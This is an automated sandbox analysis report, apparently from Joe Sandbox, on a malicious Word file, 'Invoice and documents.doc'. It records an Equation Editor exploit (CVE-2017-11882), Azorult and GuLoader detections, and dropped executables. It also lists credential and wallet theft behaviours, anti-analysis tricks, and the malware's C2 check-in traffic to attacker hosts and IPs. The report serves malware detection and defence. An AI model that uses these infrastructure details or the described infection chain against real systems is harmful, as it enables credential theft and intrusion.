Analysis Report Invoice and documents.doc

Overview

General Information

Sample Name: Invoice and documents.doc
Analysis ID: 287949
MD5: 007853972dfeabc5d367f853fa62a59a
SHA1: 303fb9261c4279cff64f973081d1b339c2fde73e
SHA256: d3b837c6df7e17d6f6ff9c20066fa5b0064408935d62bacdd4c9b5791002b941
Tags: doc

Most interesting Screenshot:

Detection

Azorult GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exe Virustotal: Detection: 19% Perma Link
Multi AV Scanner detection for submitted file
Source: Invoice and documents.doc Virustotal: Detection: 37% Perma Link
Source: Invoice and documents.doc ReversingLabs: Detection: 48%

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.uttaranchaltoday.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.176.142:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.67.176.142:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49170 -> 103.247.10.55:80
Source: Traffic Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.22:49170
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
Source: global traffic HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 23025Cache-Control: no-cache
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD6A1C03-4E04-4856-9DA8-291722E1F767}.tmp Jump to behavior
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.uttaranchaltoday.com
Source: unknown HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: officestore.co.idContent-Length: 103Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ocsp.thawte.com0
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mozglue.dll.5.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: http://www.mozilla.com0
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 6335590522394284581959.tmp.5.dr String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\hfoewnmm.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003214B7 NtWriteVirtualMemory, 4_2_003214B7
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032021B EnumWindows,NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_0032021B
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00323AF0 NtResumeThread, 4_2_00323AF0
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032374C NtProtectVirtualMemory, 4_2_0032374C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003213B7 NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_003213B7
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00323C1D NtResumeThread, 4_2_00323C1D
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032151A NtWriteVirtualMemory, 4_2_0032151A
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003235A6 NtWriteVirtualMemory, 4_2_003235A6
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_003231AA NtWriteVirtualMemory, 4_2_003231AA
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00321994 NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_00321994
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_0032027D NtSetInformationThread,CloseServiceHandle,TerminateProcess, 4_2_0032027D
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00321685 NtWriteVirtualMemory, 4_2_00321685
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00323B0C NtResumeThread, 4_2_00323B0C
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00323B5D NtResumeThread, 4_2_00323B5D
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00323BB4 NtResumeThread, 4_2_00323BB4
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_004013E4 4_2_004013E4
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 4_2_00401401 4_2_00401401
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Code function: 5_3_1F2D85DF 5_3_1F2D85DF
PE file contains strange resources
Source: linkscry[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hfoewnmm.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file does not import any functions
Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.5.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.5.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.5.dr Static PE information: No import functions for PE file found
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@6/61@4/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$voice and documents.doc Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Mutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-39EA5133-2DF4BF06
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCE94.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: SELECT ALL id FROM %s;
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Invoice and documents.doc Virustotal: Detection: 37%
Source: Invoice and documents.doc ReversingLabs: Detection: 48%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130947235.000000001FCE0000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127983806.000000001F2E0000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, mozglue.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130295141.000000001FC54000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.5.dr
Source: Binary string: ucrtbase.pdb source: hfoewnmm.exe, 00000005.00000003.2131995490.000000001FD20000.00000004.00000001.sdmp, ucrtbase.dll.5.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: hfoewnmm.exe, 00000005.00000003.2128331675.000000001F330000.00000004.00000001.sdmp, freebl3.dll.5.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130225554.000000001FC48000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2128043527.000000001F2D8000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127631724.000000001FE34000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.5.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, mozglue.dll.5.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130267131.000000001FC50000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127208242.000000001F2D4000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: hfoewnmm.exe, 00000005.00000003.2128331675.000000001F330000.00000004.00000001.sdmp, freebl3.dll.5.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130202575.000000001FC44000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130295141.000000001FC54000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130986178.000000001FCF0000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr
Source: Binary string: msvcp140.i386.pdb source: hfoewnmm.exe, 00000005.00000003.2128903368.000000001E854000.00000004.00000001.sdmp, msvcp140.dll.5.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.5.dr
Source: Binary string: ucrtbase.pdbUGP source: hfoewnmm.exe, 00000005.00000003.2131995490.000000001FD20000.00000004.00000001.sdmp, ucrtbase.dll.5.dr
